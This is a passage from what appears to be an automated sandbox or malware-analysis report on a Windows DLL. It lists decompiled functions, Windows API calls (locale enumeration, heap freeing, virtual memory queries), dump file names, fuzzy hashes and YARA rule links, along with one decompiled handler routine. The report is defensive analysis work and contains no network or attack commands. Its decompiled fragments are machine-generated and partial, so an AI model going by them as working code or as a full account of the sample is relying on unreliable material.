                                                                                                            0x00000000
                                                                                                            0x6f0325af
                                                                                                            0x00000000
                                                                                                            0x6f0325a5
                                                                                                            0x6f032528
                                                                                                            0x6f03252b
                                                                                                            0x6f032530
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f032539
                                                                                                            0x6f03253b
                                                                                                            0x6f032541
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f032547
                                                                                                            0x6f03254d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f032553
                                                                                                            0x6f032555
                                                                                                            0x6f03255e
                                                                                                            0x6f032562
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f032568
                                                                                                            0x6f03256b
                                                                                                            0x6f03256d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f032574
                                                                                                            0x6f032576
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f032578
                                                                                                            0x6f03257c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f03257c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f032467
                                                                                                            0x6f032467
                                                                                                            0x6f032467
                                                                                                            0x6f03246e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f032470
                                                                                                            0x6f032471
                                                                                                            0x6f032473
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f032473
                                                                                                            0x6f03249b
                                                                                                            0x6f03249d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f0324ad
                                                                                                            0x6f0324af
                                                                                                            0x6f0324b1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f0324b7
                                                                                                            0x6f0324be
                                                                                                            0x6f0324ea
                                                                                                            0x6f0324ea
                                                                                                            0x6f0324ec
                                                                                                            0x6f0324ee
                                                                                                            0x6f032502
                                                                                                            0x6f032504
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f0324f0
                                                                                                            0x6f0324f0
                                                                                                            0x6f0324f0
                                                                                                            0x6f0324f9
                                                                                                            0x6f0324fa
                                                                                                            0x6f0324fc
                                                                                                            0x6f0324fe
                                                                                                            0x6f0324fe
                                                                                                            0x00000000
                                                                                                            0x6f0324f0
                                                                                                            0x6f0324c0
                                                                                                            0x6f0324c3
                                                                                                            0x6f0324c5
                                                                                                            0x6f0324d7
                                                                                                            0x6f0324d7
                                                                                                            0x6f0324da
                                                                                                            0x6f0324dc
                                                                                                            0x6f0324dc
                                                                                                            0x6f0324dd
                                                                                                            0x6f0324dd
                                                                                                            0x6f0324e3
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f0324c7
                                                                                                            0x6f0324c7
                                                                                                            0x6f0324c7
                                                                                                            0x6f0324ce
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f0324d0
                                                                                                            0x6f0324d0
                                                                                                            0x6f0324d1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f0324d1
                                                                                                            0x6f0324d3
                                                                                                            0x6f0324d5
                                                                                                            0x6f0324e8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f0324e8
                                                                                                            0x00000000
                                                                                                            0x6f0324d5
                                                                                                            0x6f032447
                                                                                                            0x6f03244a
                                                                                                            0x6f03244d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f03244f
                                                                                                            0x6f032451
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x6f032451
                                                                                                            0x6f032416
                                                                                                            0x6f032418
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6F032486
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750582805.000000006F031000.00000020.00020000.sdmp, Offset: 6F030000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.750561840.000000006F030000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750629252.000000006F033000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750647663.000000006F035000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750677952.000000006F036000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: MemoryQueryVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 2850889275-0
                                                                                                            • Opcode ID: 32b31e6d03a1ebbb091fd021124373b219e844d504206b82c32bfcec8092d49b
                                                                                                            • Instruction ID: 12af81ace2adb0b5311cdec797dd3d76cb4733b7b88228c5571d1a8e1c391d7c
                                                                                                            • Opcode Fuzzy Hash: 32b31e6d03a1ebbb091fd021124373b219e844d504206b82c32bfcec8092d49b
                                                                                                            • Instruction Fuzzy Hash: 4261B433E046339FDB19CE28D9A075973F1FF85314B668569D856CB284E731EA82C6D0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F09E3AD, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 6F08F299: GetLastError.KERNEL32(00000000,00000000,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000,00000004), ref: 6F08F29E
                                                                                                              • Part of subcall function 6F08F299: SetLastError.KERNEL32(00000000,6F0DA1A0,000000FF,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000), ref: 6F08F33C
                                                                                                            • EnumSystemLocalesW.KERNEL32(6F09E4D3,00000001,00000000,?,-00000050,?,6F09EB01,00000000,?,?,?,00000055,?), ref: 6F09E41F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 2417226690-0
                                                                                                            • Opcode ID: b1cf89e52e568a2ef35737654653f4cd3cd9b47912086058892b1197ee770050
                                                                                                            • Instruction ID: 51805fe9450a12945ad9cdf7491062e230ac7b9b42ec5f5d9c949387a3b64e0e
                                                                                                            • Opcode Fuzzy Hash: b1cf89e52e568a2ef35737654653f4cd3cd9b47912086058892b1197ee770050
                                                                                                            • Instruction Fuzzy Hash: DD114C376047059FDB189F39C8947AAB7E2FF80328B14843DE9868BA40E371B942DB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F09E448, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 6F08F299: GetLastError.KERNEL32(00000000,00000000,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000,00000004), ref: 6F08F29E
                                                                                                              • Part of subcall function 6F08F299: SetLastError.KERNEL32(00000000,6F0DA1A0,000000FF,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000), ref: 6F08F33C
                                                                                                            • EnumSystemLocalesW.KERNEL32(6F09E726,00000001,00000000,?,-00000050,?,6F09EAC5,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 6F09E492
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 2417226690-0
                                                                                                            • Opcode ID: 678d8fece3a7e014b813894f42e34553aa5817a7d1ab223615d9d850976d9ac5
                                                                                                            • Instruction ID: 248ec74454ff6458901016a63db1598f1f91d200e9c84f18a07fe915082e8903
                                                                                                            • Opcode Fuzzy Hash: 678d8fece3a7e014b813894f42e34553aa5817a7d1ab223615d9d850976d9ac5
                                                                                                            • Instruction Fuzzy Hash: 22F0F6362003056FDB245F79D884B6ABBD5FF85378F05842DE9454B680E7B1AC01E720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F090429, Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 6F07843F: RtlEnterCriticalSection.NTDLL(?), ref: 6F07844E
                                                                                                            • EnumSystemLocalesW.KERNEL32(6F09041C,00000001,6F0D8410,0000000C,6F090CBD,00000000), ref: 6F090461
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 1272433827-0
                                                                                                            • Opcode ID: 90cd5ae5026fa3844f43983bf15292bea3823d5417db0724656a31ae648f2e41
                                                                                                            • Instruction ID: 7c4b1bc9339cd010544951c72086cf86668fb7f34c6a71387adfae1233f4d9e8
                                                                                                            • Opcode Fuzzy Hash: 90cd5ae5026fa3844f43983bf15292bea3823d5417db0724656a31ae648f2e41
                                                                                                            • Instruction Fuzzy Hash: 53F049B6A04714DFDB10DFA8D841B9DB7F0FB06329F10816AE4259B290DB7549109F40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F09E344, Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 6F08F299: GetLastError.KERNEL32(00000000,00000000,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000,00000004), ref: 6F08F29E
                                                                                                              • Part of subcall function 6F08F299: SetLastError.KERNEL32(00000000,6F0DA1A0,000000FF,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000), ref: 6F08F33C
                                                                                                            • EnumSystemLocalesW.KERNEL32(6F09E29D,00000001,00000000,?,?,6F09EB23,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 6F09E37B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 2417226690-0
                                                                                                            • Opcode ID: 5e0e7121580d258469cf6723b3cbb6f17b61ce857a2f6779297695e69eb68dfb
                                                                                                            • Instruction ID: 315935d8f87d656642efde1e98d3e9c0874fd1799dcaf85b6f7e09b68a5ed8e0
                                                                                                            • Opcode Fuzzy Hash: 5e0e7121580d258469cf6723b3cbb6f17b61ce857a2f6779297695e69eb68dfb
                                                                                                            • Instruction Fuzzy Hash: 0BF0E53A30020597DB049F75D948B6ABFA5FFC1725F0A805DEA198B241D671A842E7A0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F090E4C, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,6F0933BC,?,20001004,00000000,00000002,?,?,6F09271D), ref: 6F090E80
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale
                                                                                                            • String ID:
                                                                                                            • API String ID: 2299586839-0
                                                                                                            • Opcode ID: b18d64e0765c7d52cdc77913d554e1e288f9f5d97d6f48ceae1d5657497b89d1
                                                                                                            • Instruction ID: f027d27dcd378d34514a84c3bf5ded822101c42bd17c11dcfa543502689be51c
                                                                                                            • Opcode Fuzzy Hash: b18d64e0765c7d52cdc77913d554e1e288f9f5d97d6f48ceae1d5657497b89d1
                                                                                                            • Instruction Fuzzy Hash: 7EE04F32504A1CFBCF122F71DC08F9E3E1AEF45765F009111FD1566190DB729921BAD4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F069EB5, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,00000008,?,00000000,?,?,6F06981B,?,00000022,00000000,00000002,?,?,6F066C7B,00000000,?), ref: 6F069EE2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale
                                                                                                            • String ID:
                                                                                                            • API String ID: 2299586839-0
                                                                                                            • Opcode ID: aee3ae516ce8c723d0d89ae319cc53792d18dbaee04811cabbc4f7eb4c85cdd3
                                                                                                            • Instruction ID: 5992c415745552788d97a94ea1cdc980ca9ca41949b25867aed2ff44f459ed04
                                                                                                            • Opcode Fuzzy Hash: aee3ae516ce8c723d0d89ae319cc53792d18dbaee04811cabbc4f7eb4c85cdd3
                                                                                                            • Instruction Fuzzy Hash: 6DE0C23280092CEBCF025FA5EC489EE3F2AEF06775B044005F90806114CB329831ABD1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F08A2B1, Relevance: .7, Instructions: 668COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            • Opcode ID: 5f40a0dd0c4a552ff0e23014a82536aaffd7119b4394a32d190597e9de75930b
                                                                                                            • Instruction ID: 9db0e9bcca2fb29e19de50a3aeb7167c9db21a730525391c5bb3785f24f02dad
                                                                                                            • Opcode Fuzzy Hash: 5f40a0dd0c4a552ff0e23014a82536aaffd7119b4394a32d190597e9de75930b
                                                                                                            • Instruction Fuzzy Hash: 1F32BF74E0021AEFCF14CF58C980BAEBBB5EF45304F244169DC95AB794D732AA46CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F07B597, Relevance: .2, Instructions: 159COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1ae250e2fa9cb032ab4decf3eb4112c102881edd031f61f0994919ae6be86db0
                                                                                                            • Instruction ID: afb265f2da1a665e8a783e8572e697297542612953cbbfebcdf8ebc2d70fdfef
                                                                                                            • Opcode Fuzzy Hash: 1ae250e2fa9cb032ab4decf3eb4112c102881edd031f61f0994919ae6be86db0
                                                                                                            • Instruction Fuzzy Hash: BC51A471E00259EFDF14CFA9C990BEEBBB2FF88304F588099E504AB245C734AA51CB54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F0321B4, Relevance: .1, Instructions: 77COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 71%
                                                                                                            			E6F0321B4(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E6F03231B(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E6F0323D5(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E6F0322C0(_t55, _t66);
										_t89 = _t66 + 0x10;
										E6F03231B(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E6F0323B7(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                                                                                                            0x6f0321b8
                                                                                                            0x6f0321b9
                                                                                                            0x6f0321ba
                                                                                                            0x6f0321bd
                                                                                                            0x6f0321bf
                                                                                                            0x6f0321c2
                                                                                                            0x6f0321c3
                                                                                                            0x6f0321c5
                                                                                                            0x6f0321c6
                                                                                                            0x6f0321c7
                                                                                                            0x6f0321ca
                                                                                                            0x6f0321d4
                                                                                                            0x6f032285
                                                                                                            0x6f03228c
                                                                                                            0x6f032295
                                                                                                            0x6f0321da
                                                                                                            0x6f0321da
                                                                                                            0x6f0321e0
                                                                                                            0x6f0321e6
                                                                                                            0x6f0321e9
                                                                                                            0x6f0321ec
                                                                                                            0x6f0321f0
                                                                                                            0x6f0321f5
                                                                                                            0x6f0321fa
                                                                                                            0x6f03227a
                                                                                                            0x00000000
                                                                                                            0x6f0321fc
                                                                                                            0x6f0321fc
                                                                                                            0x6f032208
                                                                                                            0x6f03220a
                                                                                                            0x6f032265
                                                                                                            0x6f032265
                                                                                                            0x6f03226b
                                                                                                            0x00000000
                                                                                                            0x6f03220c
                                                                                                            0x6f03221b
                                                                                                            0x6f03221d
                                                                                                            0x6f03221e
                                                                                                            0x6f03221f
                                                                                                            0x6f032222
                                                                                                            0x6f032222
                                                                                                            0x6f032224
                                                                                                            0x00000000
                                                                                                            0x6f032226
                                                                                                            0x6f032226
                                                                                                            0x6f032270
                                                                                                            0x6f032228
                                                                                                            0x6f032228
                                                                                                            0x6f03222c
                                                                                                            0x6f032234
                                                                                                            0x6f032239
                                                                                                            0x6f03223e
                                                                                                            0x6f03224a
                                                                                                            0x6f032252
                                                                                                            0x6f032259
                                                                                                            0x6f03225f
                                                                                                            0x6f032263
                                                                                                            0x00000000
                                                                                                            0x6f032263
                                                                                                            0x6f032226
                                                                                                            0x6f032224
                                                                                                            0x00000000
                                                                                                            0x6f03220a
                                                                                                            0x6f03227e
                                                                                                            0x6f03227e
                                                                                                            0x6f03227e
                                                                                                            0x6f0321fa
                                                                                                            0x6f03229a
                                                                                                            0x6f0322a1

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750582805.000000006F031000.00000020.00020000.sdmp, Offset: 6F030000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.750561840.000000006F030000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750629252.000000006F033000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750647663.000000006F035000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.750677952.000000006F036000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                            • Instruction ID: 67ad78b511b025594417c730388c85083c4dbdd8673d85614dc68292ab57db7e
                                                                                                            • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                            • Instruction Fuzzy Hash: 1121B633D04215AFDB10DF68CC80AABB7A5FF49350B0581A9D9159B245D730FA25CBE0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F066CAF, Relevance: 48.3, APIs: 32, Instructions: 287COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F066CB6
                                                                                                            • collate.LIBCPMT ref: 6F066CBF
                                                                                                              • Part of subcall function 6F0659D8: __EH_prolog3_GS.LIBCMT ref: 6F0659DF
                                                                                                              • Part of subcall function 6F0659D8: __Getcoll.LIBCPMT ref: 6F065A43
                                                                                                              • Part of subcall function 6F0659D8: std::_Locinfo::~_Locinfo.LIBCPMT ref: 6F065A5F
                                                                                                            • __Getcoll.LIBCPMT ref: 6F066D05
                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6F066D19
                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6F066D2E
                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6F066D7F
                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6F066EB4
                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6F066EC7
                                                                                                            • int.LIBCPMT ref: 6F066ED4
                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6F066EE4
                                                                                                            • int.LIBCPMT ref: 6F066EF1
                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6F066F01
                                                                                                            • int.LIBCPMT ref: 6F066F0E
                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6F066F1E
                                                                                                            • int.LIBCPMT ref: 6F066CDF
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::_Lockit.LIBCPMT ref: 6F05208C
                                                                                                              • Part of subcall function 6F05207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6F0520A6
                                                                                                            • int.LIBCPMT ref: 6F066D42
                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6F066D6C
                                                                                                            • int.LIBCPMT ref: 6F066D97
                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6F066DC5
                                                                                                            • int.LIBCPMT ref: 6F066DD2
                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6F066DF9
                                                                                                            • int.LIBCPMT ref: 6F066E06
                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6F066E56
                                                                                                            • int.LIBCPMT ref: 6F066E63
                                                                                                            • int.LIBCPMT ref: 6F066F36
                                                                                                            • numpunct.LIBCPMT ref: 6F066F5D
                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6F066F6D
                                                                                                            • int.LIBCPMT ref: 6F066F7A
                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6F066FB1
                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6F066FC4
                                                                                                            • int.LIBCPMT ref: 6F066FD1
                                                                                                            • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6F066FE1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: AddfacLocimp::_Locimp_std::locale::_$std::_$GetcollLockit$H_prolog3H_prolog3_LocinfoLocinfo::~_Lockit::_Lockit::~_collatenumpunct
                                                                                                            • String ID:
                                                                                                            • API String ID: 2009638416-0
                                                                                                            • Opcode ID: 4994eb03090cc7b491e1af23c8dbdf7622292d28f03a77a5e05c979a46f592c3
                                                                                                            • Instruction ID: b88f8a9b62268b91310e837935197862e9c1f3f2e6417438e6ac06688119bf8d
                                                                                                            • Opcode Fuzzy Hash: 4994eb03090cc7b491e1af23c8dbdf7622292d28f03a77a5e05c979a46f592c3
                                                                                                            • Instruction Fuzzy Hash: 3D91F670E05325AAEB246BB58E41B7F7AE9DF47754F10452DF808AF2C1EB748D1087A2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F09B2A4, Relevance: 19.6, APIs: 13, Instructions: 113COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • ___free_lconv_mon.LIBCMT ref: 6F09B2E8
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA15
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA27
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA39
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA4B
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA5D
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA6F
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA81
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CA93
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CAA5
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CAB7
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CAC9
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CADB
                                                                                                              • Part of subcall function 6F09C9F8: _free.LIBCMT ref: 6F09CAED
                                                                                                            • _free.LIBCMT ref: 6F09B2DD
                                                                                                              • Part of subcall function 6F091434: HeapFree.KERNEL32(00000000,00000000,?,6F09D1C0,?,00000000,?,?,?,6F09D4C4,?,00000007,?,?,6F09B43B,?), ref: 6F09144A
                                                                                                              • Part of subcall function 6F091434: GetLastError.KERNEL32(?,?,6F09D1C0,?,00000000,?,?,?,6F09D4C4,?,00000007,?,?,6F09B43B,?,?), ref: 6F09145C
                                                                                                            • _free.LIBCMT ref: 6F09B2FF
                                                                                                            • _free.LIBCMT ref: 6F09B314
                                                                                                            • _free.LIBCMT ref: 6F09B31F
                                                                                                            • _free.LIBCMT ref: 6F09B341
                                                                                                            • _free.LIBCMT ref: 6F09B354
                                                                                                            • _free.LIBCMT ref: 6F09B362
                                                                                                            • _free.LIBCMT ref: 6F09B36D
                                                                                                            • _free.LIBCMT ref: 6F09B3A5
                                                                                                            • _free.LIBCMT ref: 6F09B3AC
                                                                                                            • _free.LIBCMT ref: 6F09B3C9
                                                                                                            • _free.LIBCMT ref: 6F09B3E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.750757403.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                            • String ID:
                                                                                                            • API String ID: 161543041-0
                                                                                                            • Opcode ID: 470744bdfdf01437a282fe4940c7cf31b79590a7af01519aebf5157f1fb0f870
                                                                                                            • Instruction ID: 3f9fa70ca20f02cb9c3e7a39182d44f9e0c1c8e6995c2c591b584dee4214acfc
                                                                                                            • Opcode Fuzzy Hash: 470744bdfdf01437a282fe4940c7cf31b79590a7af01519aebf5157f1fb0f870
                                                                                                            • Instruction Fuzzy Hash: 693139B16047019FEB118B39DA40BDA73E9AF04324F54A42AE465DB191EF30FA81EB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 6F092FB2, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 285COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 6F08F299: GetLastError.KERNEL32(00000000,00000000,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000,00000004), ref: 6F08F29E
                                                                                                              • Part of subcall function 6F08F299: SetLastError.KERNEL32(00000000,6F0DA1A0,000000FF,?,6F087CF9,?,?,00000003,?,6F051083,6F0510F4,?,6F050EE0,00000000,00000000,00000000), ref: 6F08F33C
                                                                                                            • _free.LIBCMT ref: 6F0932BF
                                                                                                            • _free.LIBCMT ref: 6F0932D8
                                                                                                            • _free.LIBCMT ref: 6F093316
                                                                                                            • _free.LIBCMT ref: 6F09331F
                                                                                                            • _free.LIBCMT ref: 6F09332B
                                                                                                            Strings
                                                                                                            Memory Dump Source
